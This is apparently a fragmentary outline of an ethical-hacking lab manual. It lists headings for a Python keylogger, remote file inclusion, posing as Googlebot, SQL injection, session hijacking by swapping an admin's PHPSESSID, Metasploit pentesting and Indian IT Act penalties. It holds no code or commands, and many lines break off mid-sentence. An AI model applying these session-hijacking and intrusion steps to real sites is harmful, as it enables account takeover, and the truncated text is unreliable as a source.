A) Create keylogger using python:

Hacking web servers, web applications

Aim: - Hacking a website by Remote File Inclusion, Disguise as Google Bot to

B) Disguise as Google Bot:

Check for Proxy:

Config browser to google bot:

Output: checking proxy again:

SQL injection and Session hijacking

Aim: - SQL injection for website hacking, session hijacking.

Copying Admin PHPSESSID :

Loging in as different user:

Replacing user PHPSESSID with Admin’s:

Admin session taking over user’s:

Wireless network hacking, cloud computing security, cryptography

Aim: - Perform encryption and decryption of text by using cryptool2

1) Explain Penetration Testing using Metasploit and metasploitable.

Penetration testing, often called “pentesting”, “pen testing”, "network penetration

Pen Test Steps

• Set the scope

• Command shell payloads that enable users to run scripts or random

The Main Goal of Metasploitable Is To Provide A Vulnerable Operating System,

To Practicing And Testing Pentesting Skill, Metasploitable Virtual Machine is best

2) Cyberlaw section under IT act 2000

shall be punishable with imprisonment for a term which may extend to

imprisonment of either description for a term which may extend to five

You might also like